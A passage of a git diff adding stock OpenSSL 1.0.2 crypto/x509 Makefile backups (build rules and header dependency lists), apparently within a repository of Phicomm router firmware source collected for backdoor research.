+x509type.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509type.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509type.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509type.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509type.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509type.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509type.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509type.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509type.c
+x_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_all.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_all.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+x_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+x_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_all.o: ../../include/openssl/x509v3.h ../cryptlib.h x_all.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.bak
new file mode 100644
index 0000000..9ee3641
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.bak
@@ -0,0 +1,370 @@
+#
+# OpenSSL/crypto/x509/Makefile
+#
+
+DIR=	x509
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	x509_def.c x509_d2.c x509_r2x.c x509_cmp.c \
+	x509_obj.c x509_req.c x509spki.c x509_vfy.c \
+	x509_set.c x509cset.c x509rset.c x509_err.c \
+	x509name.c x509_v3.c x509_ext.c x509_att.c \
+	x509type.c x509_lu.c x_all.c x509_txt.c \
+	x509_trs.c by_file.c by_dir.c x509_vpm.c
+LIBOBJ= x509_def.o x509_d2.o x509_r2x.o x509_cmp.o \
+	x509_obj.o x509_req.o x509spki.o x509_vfy.o \
+	x509_set.o x509cset.o x509rset.o x509_err.o \
+	x509name.o x509_v3.o x509_ext.o x509_att.o \
+	x509type.o x509_lu.o x_all.o x509_txt.o \
+	x509_trs.o by_file.o by_dir.o x509_vpm.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509.h x509_vfy.h
+HEADER=	$(EXHEADER) vpm_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+by_dir.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+by_dir.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+by_dir.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+by_dir.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+by_dir.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+by_dir.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+by_dir.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+by_dir.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+by_dir.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+by_dir.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+by_dir.o: ../cryptlib.h by_dir.c
+by_file.o: ../../e_os.h ../../include/openssl/asn1.h
+by_file.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+by_file.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+by_file.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+by_file.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+by_file.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+by_file.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+by_file.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+by_file.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+by_file.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+by_file.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+by_file.o: ../../include/openssl/x509_vfy.h ../cryptlib.h by_file.c
+x509_att.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_att.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_att.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_att.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_att.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_att.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_att.o: ../../include/openssl/opensslconf.h
+x509_att.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_att.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_att.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_att.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_att.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_att.o: ../cryptlib.h x509_att.c
+x509_cmp.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_cmp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_cmp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_cmp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_cmp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_cmp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_cmp.o: ../../include/openssl/opensslconf.h
+x509_cmp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_cmp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_cmp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_cmp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_cmp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_cmp.o: ../cryptlib.h x509_cmp.c
+x509_d2.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_d2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_d2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_d2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_d2.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_d2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_d2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_d2.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_d2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_d2.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_d2.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_d2.c
+x509_def.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_def.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_def.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_def.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_def.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_def.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_def.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_def.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_def.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_def.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_def.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_def.c
+x509_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x509_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_err.o: ../../include/openssl/opensslconf.h
+x509_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_err.o: ../../include/openssl/x509_vfy.h x509_err.c
+x509_ext.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_ext.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_ext.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_ext.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_ext.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_ext.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_ext.o: ../../include/openssl/opensslconf.h
+x509_ext.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_ext.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_ext.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_ext.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_ext.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_ext.o: ../cryptlib.h x509_ext.c
+x509_lu.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_lu.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_lu.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_lu.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_lu.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_lu.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_lu.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_lu.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_lu.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_lu.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_lu.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_lu.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_lu.c
+x509_obj.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_obj.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_obj.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_obj.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_obj.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_obj.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_obj.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_obj.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_obj.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_obj.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_obj.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_obj.c
+x509_r2x.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_r2x.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+x509_r2x.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x509_r2x.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_r2x.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_r2x.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_r2x.o: ../../include/openssl/opensslconf.h
+x509_r2x.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_r2x.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_r2x.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_r2x.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_r2x.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_r2x.c
+x509_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x509_req.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x509_req.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_req.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_req.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_req.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_req.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_req.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+x509_req.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_req.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_req.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_req.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_req.c
+x509_set.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_set.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_set.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_set.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_set.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_set.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_set.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_set.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_set.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_set.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_set.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_set.c
+x509_trs.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_trs.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_trs.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_trs.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_trs.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_trs.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_trs.o: ../../include/openssl/opensslconf.h
+x509_trs.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_trs.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_trs.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_trs.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_trs.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_trs.o: ../cryptlib.h x509_trs.c
+x509_txt.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_txt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_txt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509_txt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509_txt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509_txt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509_txt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_txt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_txt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_txt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_txt.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509_txt.c
+x509_v3.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_v3.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_v3.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_v3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_v3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_v3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_v3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x509_v3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x509_v3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x509_v3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x509_v3.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x509_v3.o: ../../include/openssl/x509v3.h ../cryptlib.h x509_v3.c
+x509_vfy.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vfy.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vfy.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vfy.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vfy.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vfy.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vfy.o: ../../include/openssl/opensslconf.h
+x509_vfy.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vfy.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vfy.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vfy.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vfy.o: ../cryptlib.h vpm_int.h x509_vfy.c
+x509_vpm.o: ../../e_os.h ../../include/openssl/asn1.h
+x509_vpm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509_vpm.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+x509_vpm.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x509_vpm.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x509_vpm.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x509_vpm.o: ../../include/openssl/opensslconf.h
+x509_vpm.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509_vpm.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509_vpm.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509_vpm.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509_vpm.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x509_vpm.o: ../cryptlib.h vpm_int.h x509_vpm.c
+x509cset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509cset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509cset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509cset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509cset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509cset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509cset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509cset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509cset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509cset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509cset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509cset.c
+x509name.o: ../../e_os.h ../../include/openssl/asn1.h
+x509name.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509name.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509name.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509name.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509name.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509name.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509name.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509name.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509name.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509name.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509name.c
+x509rset.o: ../../e_os.h ../../include/openssl/asn1.h
+x509rset.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509rset.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509rset.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509rset.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509rset.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509rset.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509rset.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509rset.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509rset.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509rset.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509rset.c
+x509spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x509spki.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509spki.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509spki.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509spki.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509spki.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509spki.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509spki.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509spki.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509spki.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509spki.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509spki.c
+x509type.o: ../../e_os.h ../../include/openssl/asn1.h
+x509type.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x509type.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x509type.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x509type.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x509type.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x509type.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x509type.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x509type.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x509type.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x509type.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x509type.c
+x_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_all.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_all.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+x_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_all.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+x_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_all.o: ../../include/openssl/x509v3.h ../cryptlib.h x_all.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.save
new file mode 100644
index 0000000..9ee3641
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/Makefile.save
@@ -0,0 +1,370 @@
+#
+# OpenSSL/crypto/x509/Makefile
+#
+
+DIR=	x509
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	x509_def.c x509_d2.c x509_r2x.c x509_cmp.c \
+	x509_obj.c x509_req.c x509spki.c x509_vfy.c \
+	x509_set.c x509cset.c x509rset.c x509_err.c \
+	x509name.c x509_v3.c x509_ext.c x509_att.c \
+	x509type.c x509_lu.c x_all.c x509_txt.c \
+	x509_trs.c by_file.c by_dir.c x509_vpm.c
+LIBOBJ= x509_def.o x509_d2.o x509_r2x.o x509_cmp.o \
+	x509_obj.o x509_req.o x509spki.o x509_vfy.o \
+	x509_set.o x509cset.o x509rset.o x509_err.o \
+	x509name.o x509_v3.o x509_ext.o x509_att.o \
+	x509type.o x509_lu.o x_all.o x509_txt.o \
+	x509_trs.o by_file.o by_dir.o x509_vpm.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509.h x509_vfy.h
+HEADER=	$(EXHEADER) vpm_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+by_dir.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+by_dir.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+by_dir.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+by_dir.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+by_dir.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+by_dir.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+by_dir.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+by_dir.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+by_dir.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
